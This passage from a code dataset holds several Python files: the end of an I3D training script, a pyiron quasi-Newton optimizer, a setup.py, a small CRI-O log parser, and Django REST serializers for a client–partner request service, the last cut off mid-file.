num_classes=train_dataloader.dataset.num_classes)\n else:\n raise NameError('unknown model name:{}'.format(model_name))\n if hasattr(logger, 'run_id'):\n run_id = logger.run_id\n else:\n run_id = 'no_wandb'\n \n save_model = os.path.join(save_model, model_name, run_id)\n\n # Create evaluator\n evaluator = ActionClassificationEvaluator(cfg=None,\n dataset=val_dataloader.dataset,\n split='val',\n mode='accuracy',#'mAP',\n output_dir=save_model,\n with_normal=with_normal)\n\n # device = torch.device('cuda')\n device = torch.device('cuda:{}'.format(gpu_id))\n model.to(device)\n if distributed:\n model = apex.parallel.convert_syncbn_model(model)\n model = DDP(model.to(device), delay_allreduce=True)\n # ckpt = '/home/data/vision7/brianyao/DATA/i3d_outputs/i3d/tg9s4ff5/004500.pt'\n # load_state_dict(model, torch.load(ckpt))\n\n # #######NOTE: only for testing checkpoint is correct or not ##\n # model.eval()\n # do_val(model, \n # val_dataloader, \n # device,\n # distributed, \n # logger, \n # output_dir=os.path.join(save_model, 'inference'),\n # train_iters=0,\n # evaluator=evaluator)\n # pdb.set_trace()\n # #########\n do_train(model_name,\n model, \n train_dataloader, \n val_dataloader, \n device=device,\n 
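             # do_val() runs every checkpoint_peroid steps from inside do_train\n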
checkpoint_peroid=checkpoint_peroid, \n save_model=save_model, \n logger=logger,\n evaluator=evaluator)\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('-model_name', type=str, help='name of the model to run')\n parser.add_argument('-mode', type=str, help='rgb or flow')\n parser.add_argument('-save_model', type=str)\n parser.add_argument('-root', type=str)\n parser.add_argument('-train_split', type=str)\n parser.add_argument('-val_split', type=str)\n parser.add_argument('-batch_per_gpu', type=int)\n parser.add_argument('-gpu', type=int)\n parser.add_argument('-checkpoint_peroid', type=int)\n parser.add_argument('-use_wandb', const=True, nargs='?')\n args = parser.parse_args()\n \n # need to add argparse\n run(model_name=args.model_name,\n mode=args.mode, \n gpu_id=args.gpu,\n batch_per_gpu=args.batch_per_gpu,\n train_split=args.train_split, \n val_split=args.val_split, \n root=args.root, \n save_model=args.save_model, \n checkpoint_peroid=args.checkpoint_peroid,\n with_normal=False\n )\n","sub_path":"train_i3d.py","file_name":"train_i3d.py","file_ext":"py","file_size_in_byte":20671,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"111556577","text":"import numpy as np\nfrom pyiron_base import GenericParameters\nimport warnings\nfrom pyiron_atomistics.atomistics.job.interactivewrapper import (\n InteractiveWrapper,\n ReferenceJobOutput,\n)\n\n\nclass QuasiNewtonInteractive:\n \"\"\"\n Interactive class of Quasi Newton. This class can be used without a pyiron job definition.\n After the initialization, the displacement is obtained by calling `get_dx` successively.\n \"\"\"\n\n def __init__(\n self,\n structure,\n starting_h=10,\n diffusion_id=None,\n diffusion_direction=None,\n use_eigenvalues=True,\n symmetrize=True,\n max_displacement=0.1,\n ):\n \"\"\"\n Args:\n structure (pyiron_atomistics.atomistics.structure.atoms.Atoms): pyiron structure\n starting_H (float/ndarray): Starting Hessian value (diagonal value or total Hessian)\n diffusion_id (int/None): Atom id at saddle point. No need to define if the structure\n is close enough to the saddle point. This has to be defined together with\n `diffusion_direction`.\n use_eigenvalues (bool): Whether to use the eigenvalue softening or standard Tikhonov\n regularization to prevent unphysical displacement.\n symmetrize (bool): Whether to symmetrize forces following the box symmetries. 
DFT\n calculations might fail if set to `False`\n max_displacement (float): Maximum displacement allowed for an atom.\n \"\"\"\n self.use_eigenvalues = use_eigenvalues\n self._hessian = None\n self._eigenvalues = None\n self._eigenvectors = None\n self.g_old = None\n self.symmetry = None\n self.max_displacement = max_displacement\n self.regularization = None\n if symmetrize:\n self.symmetry = structure.get_symmetry()\n self._initialize_hessian(\n structure=structure,\n starting_h=starting_h,\n diffusion_id=diffusion_id,\n diffusion_direction=diffusion_direction,\n )\n\n def _initialize_hessian(\n self, structure, starting_h=10, diffusion_id=None, diffusion_direction=None\n ):\n if (\n np.prod(np.array(starting_h).shape)\n == np.prod(structure.positions.shape) ** 2\n ):\n self.hessian = starting_h\n else:\n self.hessian = starting_h * np.eye(np.prod(structure.positions.shape))\n if diffusion_id is not None and diffusion_direction is not None:\n v = np.zeros_like(structure.positions)\n v[diffusion_id] = diffusion_direction\n v = v.flatten()\n self.hessian -= (\n (starting_h + 1) * np.einsum(\"i,j->ij\", v, v) / np.linalg.norm(v) ** 2\n )\n self.use_eigenvalues = True\n elif diffusion_id is not None or diffusion_direction is not None:\n raise ValueError(\"diffusion id or diffusion direction not specified\")\n\n def _set_regularization(self, g, max_cycle=20, max_value=20, tol=1.0e-8):\n self.regularization = -2\n for _ in range(max_cycle):\n if np.absolute(self.inv_hessian.dot(g)).max() < self.max_displacement:\n break\n self.regularization += 1\n if np.absolute(self.regularization) > max_value:\n self.regularization = max_value\n\n @property\n def inv_hessian(self):\n if self.regularization is None:\n return np.linalg.inv(self.hessian)\n if self.use_eigenvalues:\n return np.einsum(\n \"ik,k,jk->ij\",\n self.eigenvectors,\n self.eigenvalues\n / (self.eigenvalues**2 + np.exp(self.regularization)),\n self.eigenvectors,\n )\n else:\n return np.linalg.inv(\n self.hessian + np.eye(len(self.hessian)) * np.exp(self.regularization)\n )\n\n @property\n def hessian(self):\n return self._hessian\n\n @hessian.setter\n def hessian(self, v):\n self._hessian = np.array(v)\n length = int(np.sqrt(np.prod(self._hessian.shape)))\n self._hessian = self._hessian.reshape(length, length)\n self._eigenvalues = None\n self._eigenvectors = None\n self.regularization = None\n\n def _calc_eig(self):\n self._eigenvalues, self._eigenvectors = np.linalg.eigh(self.hessian)\n\n @property\n def eigenvalues(self):\n if self._eigenvalues is None:\n self._calc_eig()\n return self._eigenvalues\n\n @property\n def eigenvectors(self):\n if self._eigenvectors is None:\n self._calc_eig()\n return self._eigenvectors\n\n def get_dx(self, g, threshold=1e-4, mode=\"PSB\", update_hessian=True):\n if update_hessian:\n self.update_hessian(g, threshold=threshold, mode=mode)\n self.dx = -np.einsum(\"ij,j->i\", self.inv_hessian, g.flatten()).reshape(-1, 3)\n if self.symmetry is not None:\n self.dx = self.symmetry.symmetrize_vectors(self.dx)\n if (\n np.linalg.norm(self.dx, axis=-1).max() > self.max_displacement\n and self.regularization is None\n ):\n self._set_regularization(g=g.flatten())\n return self.get_dx(\n g=g, threshold=threshold, mode=mode, update_hessian=False\n )\n return self.dx\n\n @staticmethod\n def _get_SR(dx, dg, H_tmp, threshold=1e-4):\n denominator = np.dot(H_tmp, dx)\n if np.absolute(denominator) < threshold:\n denominator += threshold\n return np.outer(H_tmp, H_tmp) / denominator\n\n @staticmethod\n def _get_PSB(dx, dg, 
H_tmp):\n dxdx = np.einsum(\"i,i->\", dx, dx)\n dH = np.einsum(\"i,j->ij\", H_tmp, dx)\n dH = (dH + dH.T) / dxdx\n return (\n dH\n - np.einsum(\"i,i,j,k->jk\", dx, H_tmp, dx, dx, optimize=\"optimal\")\n / dxdx**2\n )\n\n @staticmethod\n def _get_BFGS(dx, dg, H):\n Hx = H.dot(dx)\n return np.outer(dg, dg) / dg.dot(dx) - np.outer(Hx, Hx) / dx.dot(Hx)\n\n def update_hessian(self, g, threshold=1e-4, mode=\"PSB\"):\n if self.g_old is None:\n self.g_old = g\n return\n dg = self.get_dg(g).flatten()\n dx = self.dx.flatten()\n H_tmp = dg - np.einsum(\"ij,j->i\", self.hessian, dx)\n if mode == \"SR\":\n self.hessian = self._get_SR(dx, dg, H_tmp) + self.hessian\n elif mode == \"PSB\":\n self.hessian = self._get_PSB(dx, dg, H_tmp) + self.hessian\n elif mode == \"BFGS\":\n self.hessian = self._get_BFGS(dx, dg, self.hessian) + self.hessian\n else:\n raise ValueError(\n \"Mode not recognized: {}. Choose from `SR`, `PSB` and `BFGS`\".format(\n mode\n )\n )\n self.g_old = g\n\n def get_dg(self, g):\n return g - self.g_old\n\n\ndef run_qn(\n job,\n mode=\"PSB\",\n ionic_steps=100,\n ionic_force_tolerance=1.0e-2,\n ionic_energy_tolerance=0,\n starting_h=10,\n diffusion_id=None,\n diffusion_direction=None,\n use_eigenvalues=True,\n symmetrize=True,\n max_displacement=0.1,\n min_displacement=1.0e-8,\n):\n \"\"\"\n Args:\n job (pyiron): pyiron job\n mode (str): Hessian update scheme. `PSB`, `SR` and `BFGS` are currently available.\n ionic_steps (int): Maximum number of steps.\n ionic_force_tolerance (float): Maximum force of an atom tolerated for convergence\n ionic_energy_tolerance (float): Maximum energy difference for convergence\n starting_H (float/ndarray): Starting Hessian value (diagonal value or total Hessian)\n diffusion_id (int/None): Atom id at saddle point. No need to define if the structure\n is close enough to the saddle point. This has to be defined together with\n `diffusion_direction`.\n use_eigenvalues (bool): Whether to use the eigenvalue softening or standard Tikhonov\n regularization to prevent unphysical displacement.\n symmetrize (bool): Whether to symmetrize forces following the box symmetries. 
DFT\n            calculations might fail if set to `False`\n        max_displacement (float): Maximum displacement allowed for an atom.\n        min_displacement (float): Minimum displacement for a system to rerun\n\n    Returns:\n        qn (QuasiNewtonInteractive): Quasi Newton class variable\n    \"\"\"\n    qn = QuasiNewtonInteractive(\n        structure=job.structure,\n        starting_h=starting_h,\n        diffusion_id=diffusion_id,\n        diffusion_direction=diffusion_direction,\n        use_eigenvalues=use_eigenvalues,\n        max_displacement=max_displacement,\n        symmetrize=symmetrize,\n    )\n    job.run()\n    for _ in range(ionic_steps):\n        f = job.output.forces[-1]\n        if np.linalg.norm(f, axis=-1).max() < ionic_force_tolerance:\n            break\n        dx = qn.get_dx(-f, mode=mode)\n        if np.linalg.norm(dx, axis=-1).max() < min_displacement:\n            warnings.warn(\"line search alpha is zero\")\n            break\n        job.structure.positions += dx\n        job.structure.center_coordinates_in_unit_cell()\n        if job.server.run_mode.interactive:\n            job.run()\n        else:\n            job.run(delete_existing_job=True)\n    return qn\n\n\nclass QuasiNewton(InteractiveWrapper):\n\n    \"\"\"\n    Structure optimization scheme via Quasi-Newton algorithm.\n\n    Example:\n\n    >>> from pyiron_atomistics import Project\n    >>> pr = Project('qn_example')  # any project name works here\n    >>> spx = pr.create.job.Sphinx('spx')\n    >>> spx.structure = pr.create.structure.bulk('Al')\n    >>> spx.structure[0] = 'Ni'\n    >>> spx.interactive_open()\n    >>> qn = spx.create_job('QuasiNewton', 'qn')\n    >>> qn.run()\n\n    Currently, there are three Hessian update schemes available (cf. `qn.input.mode`):\n\n    - `PSB`: Powell-Symmetric-Broyden\n    - `SR`: Symmetric-Rank-One\n    - `BFGS`: Broyden–Fletcher–Goldfarb–Shanno\n\n    `PSB` and `SR` do not enforce a positive definite Hessian matrix, meaning they can be used to\n    obtain an energy barrier state. An energy barrier state calculation is automatically\n    performed if the system is within a harmonic distance from the saddle point. If, however,\n    the diffusion direction is already known, this information can be inserted in\n    `qn.input.diffusion_direction` and the atom id in `qn.input.diffusion_id`.\n\n    There are two types of regularization: Tikhonov regularization and eigenvalue softening\n    (`qn.input.use_eigenvalues = True`: eigenvalue softening, `... = False`: Tikhonov\n    regularization). In both cases, the regularization value is increased until the largest\n    displacement is smaller than `qn.input.max_displacement`.\n\n    Tikhonov regularization:\n\n    `x = (H + L)^{-1} * f`\n\n    where `x` is the displacement field, `H` is the Hessian matrix, `L` is the regularization\n    matrix and `f` is the force field.
The regularization values get an opposite sign for the\n directions along the negative eigenvalues, to make sure that the regularization indeed\n regularizes when there is a saddle point configuration.\n\n Eigenvalue softening:\n\n `x = M * (d / (d^2 + L)) * M^{-1} * f`\n\n where `M` is the eigenvector matrix, `d` are the eigenvalues and `L` is the regularization.\n \"\"\"\n\n def __init__(self, project, job_name):\n super().__init__(project, job_name)\n\n self.__version__ = None\n self.input = Input()\n self.output = Output(self)\n self._interactive_interface = None\n self.qn = None\n\n __init__.__doc__ = InteractiveWrapper.__init__.__doc__\n\n def _run(self):\n self.qn = run_qn(\n job=self.ref_job,\n mode=self.input[\"mode\"],\n ionic_steps=self.input[\"ionic_steps\"],\n ionic_force_tolerance=self.input[\"ionic_force_tolerance\"],\n ionic_energy_tolerance=self.input[\"ionic_energy_tolerance\"],\n starting_h=self.input[\"starting_h\"],\n diffusion_id=self.input[\"diffusion_id\"],\n diffusion_direction=self.input[\"diffusion_direction\"],\n use_eigenvalues=self.input[\"use_eigenvalues\"],\n symmetrize=self.input[\"symmetrize\"],\n max_displacement=self.input[\"max_displacement\"],\n )\n self.collect_output()\n\n def run_static(self):\n self.status.running = True\n self.ref_job_initialize()\n self._run()\n if self.ref_job.server.run_mode.interactive:\n self.ref_job.interactive_close()\n self.status.collect = True\n self.run()\n\n run_static.__doc__ = InteractiveWrapper.run_static.__doc__\n\n def interactive_close(self):\n self.status.collect = True\n if self.ref_job.server.run_mode.interactive:\n self.ref_job.interactive_close()\n self.run()\n\n interactive_close.__doc__ = InteractiveWrapper.interactive_close.__doc__\n\n def write_input(self):\n pass\n\n def collect_output(self):\n self.output._index_lst.append(len(self.ref_job.output.energy_pot))\n if self.qn is not None:\n self.output.hessian = self.qn.hessian\n self.output.to_hdf(hdf=self.project_hdf5)\n\n collect_output.__doc__ = InteractiveWrapper.collect_output.__doc__\n\n\nclass Input(GenericParameters):\n \"\"\"\n class to control the generic input for a Sphinx calculation.\n\n Args:\n input_file_name (str): name of the input file\n table_name (str): name of the GenericParameters table\n \"\"\"\n\n def __init__(self, input_file_name=None, table_name=\"input\"):\n super(Input, self).__init__(\n input_file_name=input_file_name,\n table_name=table_name,\n comment_char=\"//\",\n separator_char=\"=\",\n end_value_char=\";\",\n )\n\n __init__.__doc__ = GenericParameters.__init__.__doc__\n\n def load_default(self):\n file_content = (\n \"mode = 'PSB'\\n\"\n \"ionic_steps = 100\\n\"\n \"ionic_force_tolerance = 1.0e-2\\n\"\n \"ionic_energy_tolerance = 0\\n\"\n \"starting_h = 10\\n\"\n \"diffusion_id = None\\n\"\n \"use_eigenvalues = True\\n\"\n \"diffusion_direction = None\\n\"\n \"symmetrize = True\\n\"\n \"max_displacement = 0.1\\n\"\n )\n self.load_string(file_content)\n\n\nclass Output(ReferenceJobOutput):\n def __init__(self, job):\n super().__init__(job=job)\n self._index_lst = []\n self.hessian = None\n\n @property\n def index_lst(self):\n return np.asarray(self._index_lst)\n\n def to_hdf(self, hdf, group_name=\"output\"):\n if self.hessian is not None:\n with hdf.open(group_name) as hdf_output:\n hdf_output[\"hessian\"] = 
self.hessian\n","sub_path":"pyiron_atomistics/interactive/quasi_newton.py","file_name":"quasi_newton.py","file_ext":"py","file_size_in_byte":14738,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"248106841","text":"import os\nimport sys\nfrom setuptools import setup, find_packages\n\nnot_found_msg = \"\"\"\nFile Not Found ({fname}).\nCheck the file and restart again\n\"\"\"\n\n\ndef get_file_content(fname):\n fname = os.path.abspath(os.path.dirname(__file__)) + \"/\" + fname\n exists = os.path.isfile(fname)\n if not exists:\n print(not_found_msg.format(fname=fname))\n sys.exit(1)\n with open(fname) as f:\n return f.read()\n\n\nCURRENT_PYTHON = sys.version_info[:2]\nREQUIRED_PYTHON = (3, 6)\n#: This check and everything above must remain compatible with requiered Python\nif CURRENT_PYTHON < REQUIRED_PYTHON:\n quant_language = 2\n print(get_file_content(\"setup/required_python.txt\").format(*(\n quant_language * (REQUIRED_PYTHON + CURRENT_PYTHON))))\n sys.exit(1)\n\n\n\"\"\"\nInside a virtualenv, sys.prefix points to the virtualenv directory, and\nsys.real_prefix points to the \"real\" prefix of the system Python (often /usr or\n/usr/local or some such).\n\nOutside a virtualenv, sys.real_prefix should not exist.\n\"\"\"\n#: This Check if this script is running into virtual environment\nif not hasattr(sys, \"real_prefix\"):\n print(\"\"\"ERROR: The virtual environment is not activated!\"\"\")\n sys.exit(1)\n\n\nPROJECT_NAME = \"clv_common_py\"\nPROJECT_VERSION = \"2019.07.23.1\"\nPROJECT_DESCRIPTION = \"Common project that sets the default configuration.\"\nLONG_DESC = get_file_content(\"README.md\")\nREQUIRES = get_file_content(\"requirements.txt\").splitlines()\n\nsetup(\n #: - - - - - name - - - - -\n #: The name of the package\n #: a string\n name=PROJECT_NAME,\n\n #: - - - - - version - - - - -\n #: The version number of the package; see distutils.version\n #: a string\n version=PROJECT_VERSION,\n\n #: - - - - - install_requires - - - - -\n #: A list of standalone script files to be built and installed\n #: a list of strings\n install_requires=REQUIRES,\n\n #: - - - - - description - - - - -\n #: A single line describing the package\n #: a string\n description=PROJECT_DESCRIPTION,\n\n #: - - - - - long_description - - - - -\n #: Longer description of the package\n #: a string\n long_description=LONG_DESC,\n\n #: - - - - - packages - - - - -\n #: A list of Python packages that distutils will manipulate\n #: a list of strings\n packages=find_packages(\"config\"),\n\n #: - - - - - package_dir - - - - -\n #:\n package_dir={\"\": \"config\"},\n\n #: - - - - - author - - - - -\n #: The name of the package author\n #: a string\n # author=\"\",\n\n #: - - - - - author_email - - - - -\n #: The email address of the package author\n #: a string\n # author_email=\"\",\n\n #: - - - - - maintainer - - - - -\n #: The name of the current maintainer, if different from the author.\n #: Note that if the maintainer is provided, distutils will use it as\n #: the author in PKG-INFO\n #: a string\n # maintainer=\"\",\n\n #: - - - - - maintainer_email - - - - -\n #: The email address of the current maintainer, if different from the\n #: author\n #: a string\n # maintainer_email=\"\",\n\n #: - - - - - url - - - - -\n #: A URL for the package (homepage)\n #: a string\n # url=\"\",\n\n #: - - - - - download_url - - - - -\n #: A URL to download the package\n #: a string,\n # download_url=\"\",\n\n #: - - - - - py_modules - - - - -\n #: A list of Python modules 
that distutils will manipulate\n #: a list of strings\n # py_modules=[\"config.clv_base\", \"config.http\"],\n\n #: - - - - - scripts - - - - -\n #: A list of standalone script files to be built and installed\n #: a list of strings\n # scripts=[\"\"],\n\n #: - - - - - ext_modules - - - - -\n #: A list of Python extensions to be built\n #: a list of instances of distutils.core.Extension\n # ext_modules=[\"\"],\n\n #: - - - - - classifiers - - - - -\n #: A list of categories for the package\n #: a list of strings; valid classifiers are listed on PyPI.\n # classifiers=[\"\"],\n\n #: - - - - - script_name - - - - -\n #: The name of the setup.py script - defaults to sys.argv[0]\n #: a string\n # script_name=\"\",\n\n #: - - - - - script_args - - - - -\n #: Arguments to supply to the setup script\n #: a list of strings\n # script_args=[\"\"],\n\n #: - - - - - options - - - - -\n #: default options for the setup script\n #: a dictionary\n # options={\"\"},\n\n #: - - - - - license - - - - -\n #: The license for the package\n #: a string\n # license=\"\",\n\n #: - - - - - keywords - - - - -\n #: Descriptive meta-data, see PEP 314\n #: a list of strings or a comma-separated string\n # keywords=\"\" | [\"\"],\n\n #: - - - - - platforms - - - - -\n #: a list of strings or a comma-separated string\n # platforms=[\"\"],\n\n #: - - - - - cmdclass - - - - -\n #: A mapping of command names to Command subclasses\n #: a dictionary\n # cmdclass={\"\"},\n\n #: - - - - - data_files - - - - -\n #: A list of data files to install\n #: a list\n # data_files=[\"\"],\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":4961,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"652675475","text":"#!/usr/bin/python3.9\n# You run this script providing the name of a log file. 
For example, ./pars.py --log-file=cri-o.log\n\nimport sys\nimport os\n\npath = sys.argv[1]\nfile_name = path.split(\"=\")\n\nread = open(file_name[1])\nlines = read.readlines()\noutput = open(\"parsed_log.log\", \"w\")\n\nfor line in lines:\n lst=(line.split(\" \"))\n print('{' + '\\n' + '\\t' + '\"@timestamp\": ' + lst[0] + ',' + '\\n' + '\\t' + '\"stream\": ' + lst[1] + ',' + '\\n' + '\\t' + '\"log\": ' + ' '.join(map(str, lst[16:-1])) + '\\n' + '}', file = output)\n\nread.close()\noutput.close()\n","sub_path":"pars.py","file_name":"pars.py","file_ext":"py","file_size_in_byte":549,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"502045067","text":"from urllib.parse import quote\nimport datetime as dt\nimport functools\n\nfrom django.conf import settings\nfrom django.utils.translation import ugettext_lazy as _\n\nfrom rest_framework.reverse import reverse\nfrom rest_framework.exceptions import ValidationError\nfrom rest_framework import serializers, fields\n\nfrom rest_framework_mongoengine.serializers import (\n DocumentSerializer, EmbeddedDocumentSerializer)\n\nfrom asilinks.validators import file_max_size, FileMimetypeValidator\nfrom .documents import (Request, RoundPartner, Message,\n TimeExtension, Review)\nfrom .tasks import select_round_partners\nfrom authentication.documents import Account\nfrom main.documents import Client, Partner\nfrom main.serializers import ExtraDescriptionSerializer\nfrom payments.documents import Transaction, Bill\nfrom payments.interfaces import get_interface, ContextInterfaceError\n\nfrom admin.notification import CLIENT_MESSAGES, PARTNER_MESSAGES\n\n__all__ = [\n 'MakeRequestSerializer', 'MessageSerializer', 'ClientSerializer',\n 'OfferPartnerSerializer', 'DetailRequestSerializer', 'ListRequestSerializer',\n 'PartnerSerializer', 'RoundPartnerSerializer', 'ReviewRequestSerializer',\n 'OfferSerializer', 'TimeExtensionSerializer', 'SendMessageSerializer',\n 'PaymentTokenSerializer', 'RejectRequestSerializer',\n 'CancelRequestSerializer', 'AcceptOfferSerializer', 'SubmitRequestSerializer',\n 'ReceiveRequestSerializer', 'UnsatisfiedRequestSerializer', 'CloseRequestSerializer',\n 'RequestStatisticsSerializer',\n]\n\n\nclass MessageListSerializer(serializers.ListSerializer):\n def to_representation(self, data):\n merged_data = []\n\n for item in data.filter(reference_ts=None):\n rep = self.child.to_representation(item)\n\n try:\n rep['response'] = self.child.to_representation(\n data.get(reference_ts=item.ts))\n except:\n rep['response'] = None\n\n merged_data.append(rep)\n\n return merged_data\n\n\nclass MessageSerializer(EmbeddedDocumentSerializer):\n type = fields.ChoiceField(choices=Message.TYPE_CHOICES,\n default=Message.TYPE_TEXT, write_only=True, required=False)\n attachment = fields.FileField(max_length=None, use_url=True,\n required=False, validators=[file_max_size])\n type_display = serializers.SerializerMethodField()\n is_your = serializers.SerializerMethodField()\n is_client = serializers.SerializerMethodField()\n owner = serializers.SlugRelatedField(\n slug_field='first_name', read_only=True)\n\n class Meta:\n model = Message\n list_serializer_class = MessageListSerializer\n fields = ('content', 'owner', 'ts', 'content', 'type', 'type_display',\n 'attachment', 'last_delivery', 'is_your', 'is_client', )\n extra_kwargs = {\n 'last_delivery': {'default': False},\n }\n validators = [\n FileMimetypeValidator(options=Message.CONTENT_TYPES,\n field='attachment', mimetype_field='type')\n ]\n\n def 
get_type_display(self, obj):\n return obj.get_type_display()\n\n def get_is_your(self, obj):\n return obj.owner == self.context['request'].user\n\n def get_is_client(self, obj):\n return obj.owner == self.parent.parent.instance.client.account\n\n def validate(self, data):\n\n if data['type'] == Message.TYPE_TEXT:\n data.pop('attachment', None)\n\n if not data.get('content'):\n raise ValidationError(\n {'content': _('El mensaje no tiene contenido.')}\n )\n\n else:\n # data.pop('content', None)\n attachment = data.get('attachment')\n\n if not attachment:\n raise ValidationError(\n {'attachment': _('El mensaje no tiene archivo adjunto.')}\n )\n\n return data\n\n\nclass ClientSerializer(DocumentSerializer):\n full_name = fields.ReadOnlyField(source='account.get_full_name')\n\n class Meta:\n model = Client\n fields = ('id', 'rating', 'full_name', )\n\n\nclass PartnerSerializer(DocumentSerializer):\n full_name = fields.ReadOnlyField(source='account.get_full_name')\n residence = serializers.StringRelatedField(source='account.residence')\n\n class Meta:\n model = Partner\n fields = ('id', 'level', 'rating', 'full_name', 'residence')\n\n\nclass ListRoundPartnerSerializer(serializers.ListSerializer):\n def to_representation(self, data):\n # oculta los round partners que no han publicado oferta\n return super().to_representation(data.exclude(price=None))\n\n\nclass RoundPartnerSerializer(EmbeddedDocumentSerializer):\n partner = PartnerSerializer()\n links = serializers.SerializerMethodField()\n new = serializers.SerializerMethodField()\n\n class Meta:\n model = RoundPartner\n list_serializer_class = ListRoundPartnerSerializer\n fields = ('partner', 'links', 'last_read', 'price', 'new',\n 'description', 'duration', 'requisites', )\n\n def get_links(self, instance):\n request = self.context['request']\n # view = self.context['view']\n\n return {\n 'self': reverse('partner-detail',\n kwargs={'id': instance.partner.id}, request=request),\n }\n\n def get_new(self, instance):\n parent = self.context['view'].get_object()\n\n return instance.date_response > parent.last_read_client\n\n\nclass OfferPartnerSerializer(EmbeddedDocumentSerializer):\n\n class Meta:\n model = RoundPartner\n fields = '__all__'\n\n\nclass MakeRequestSerializer(DocumentSerializer):\n english_level = fields.CharField(write_only=True, required=False)\n estimated_duration = fields.CharField(write_only=True, required=False)\n advance_notion = fields.CharField(write_only=True, required=False)\n attachment = fields.FileField(max_length=None, use_url=True,\n required=False, write_only=True, validators=[file_max_size])\n skills = fields.ListField(write_only=True, required=False,\n child=serializers.CharField()\n )\n\n round_partners = RoundPartnerSerializer(many=True, read_only=True)\n partner = PartnerSerializer(read_only=True)\n\n questions = MessageSerializer(many=True, read_only=True)\n com_channel = MessageSerializer(many=True, read_only=True)\n status_display = serializers.SerializerMethodField()\n new_messages = serializers.SerializerMethodField()\n last_read = serializers.SerializerMethodField()\n new_offers = serializers.ReadOnlyField()\n\n class Meta:\n model = Request\n fields = ('id', 'name', 'description', 'extra_description', 'know_fields', 'date_created',\n 'questions', 'com_channel', 'country_alpha2', 'penalty_discount', 'round_partners',\n 'partner', 'partner_review', 'client_review', 'status_display', 'status', 'skills',\n 'english_level', 'estimated_duration', 'advance_notion', 'attachment', 'date_promise',\n 'new_messages', 
'last_read', 'new_offers', )\n read_only_fields = ('id', 'date_created', 'extra_description','penalty_discount',\n 'partner_review', 'client_review', 'status', 'date_promise', )\n extra_kwargs = {\n 'name': {'required': True},\n 'description': {'required': True},\n 'know_fields': {'required': True, 'min_length': 1},\n }\n validators = [\n FileMimetypeValidator(options=Message.CONTENT_TYPES,\n field='attachment')\n ]\n\n def to_representation(self, obj):\n self.fields['know_fields'] = serializers.StringRelatedField(many=True)\n return super().to_representation(obj)\n\n def get_status_display(self, obj):\n return obj.get_status_display()\n\n def get_new_messages(self, obj):\n account = self.context['request'].user\n return obj.new_messages(account)\n\n def get_last_read(self, obj):\n account = self.context['request'].user\n return obj.get_last_read(account).strftime('%s.%f')\n\n def validate(self, data):\n extra = ExtraDescriptionSerializer(data=data)\n extra.is_valid(raise_exception=True)\n\n return data\n\n def create(self, validated_data):\n attachment = validated_data.pop('attachment', None)\n extra = ExtraDescriptionSerializer(data=validated_data)\n extra.is_valid()\n [validated_data.pop(key, None) for key in ('estimated_duration',\n 'english_level', 'advance_notion', 'skills')]\n\n instance = super().create(validated_data)\n update = {\n 'extra_description':extra.save()\n }\n\n if attachment:\n _type = Message.TYPE_DOC if attachment.content_type in Message.CONTENT_TYPES[\n Message.TYPE_DOC] else Message.TYPE_IMAGE\n message = Message(ts=dt.datetime.now(), owner=self.context['request'].user,\n attachment=attachment, type=_type)\n\n message.attachment.save(message.attachment.name, \n message.attachment, save=False)\n update['push__questions'] = message\n\n instance.modify(**update)\n instance.client.modify(push__requests_todo=instance, last_activity=dt.datetime.now())\n select_round_partners(str(instance.id))\n # select_round_partners.delay(str(instance.id))\n\n return instance\n\n def update(self, instance, validated_data):\n instance.name = validated_data.get('name', instance.name)\n instance.description = validated_data.get('description', instance.description)\n\n extra = ExtraDescriptionSerializer(instance.extra_description,\n data=validated_data, partial=True)\n extra.is_valid()\n\n instance.extra_description = extra.save()\n instance.save()\n\n for rp in instance.round_partners:\n if not rp.rejected:\n rp.partner.account.send_message(context={'request': instance},\n data={'request_id': str(instance.id), 'profile': 'partner'},\n **PARTNER_MESSAGES['updated_description_requirement'])\n return instance\n\n\nclass DetailRequestSerializer(DocumentSerializer):\n round_partners = RoundPartnerSerializer(many=True)\n partner = PartnerSerializer()\n client = ClientSerializer()\n\n know_fields = serializers.StringRelatedField(many=True)\n questions = MessageSerializer(many=True)\n com_channel = MessageSerializer(many=True)\n\n status_display = serializers.SerializerMethodField()\n your_offer = serializers.SerializerMethodField()\n new_messages = serializers.SerializerMethodField()\n last_read = serializers.SerializerMethodField()\n can_cancel = serializers.SerializerMethodField()\n pending_extension = serializers.SerializerMethodField()\n new_offers = serializers.ReadOnlyField()\n\n class Meta: \n model = Request\n fields = ('id', 'name', 'know_fields', 'description', 'questions', 'com_channel',\n 'client', 'partner', 'round_partners', 'status_display', 'status',\n 'date_created', 
'date_promise', 'penalty_discount', 'your_offer',\n 'partner_review', 'client_review', 'extra_description', 'country_alpha2',\n 'new_messages', 'last_read', 'new_offers', 'can_cancel', 'pending_extension', )\n\n def __init__(self, instance, *args, **kwargs):\n if instance.status < Request.STATUS_PENDING:\n\n last_delivery = instance.com_channel.filter(last_delivery=True)\n last_delivery.update(content='', attachment=None)\n\n instance.com_channel = instance.com_channel.exclude(\n last_delivery=True)\n [instance.com_channel.append(item) for item in last_delivery]\n\n super().__init__(instance, *args, **kwargs)\n\n def get_field_names(self, declared_fields, info):\n fields = super().get_field_names(declared_fields, info)\n account = self.context['request'].user\n\n if self.instance.client == account.client_profile:\n fields_to_delete = {'client', 'your_offer'}\n else:\n fields_to_delete = {'partner', 'round_partners', 'new_offers',\n 'can_cancel', 'pending_extension'}\n\n return list(set(fields) - fields_to_delete)\n\n def get_your_offer(self, obj):\n account = self.context['request'].user\n\n try:\n round_partner = obj.round_partners.get(partner=account.partner_profile)\n except:\n return None\n\n if not round_partner.date_response:\n return None\n\n serializer = OfferPartnerSerializer(round_partner)\n return serializer.data\n\n def get_status_display(self, obj):\n return obj.get_status_display()\n\n def get_new_messages(self, obj):\n account = self.context['request'].user\n return obj.new_messages(account)\n\n def get_last_read(self, obj):\n account = self.context['request'].user\n return obj.get_last_read(account).strftime('%s.%f')\n\n def get_can_cancel(self, obj):\n return obj.can_be_canceled()\n\n def get_pending_extension(self, obj):\n return any(item.approve is None for item in obj.time_extensions)\n\n\nclass 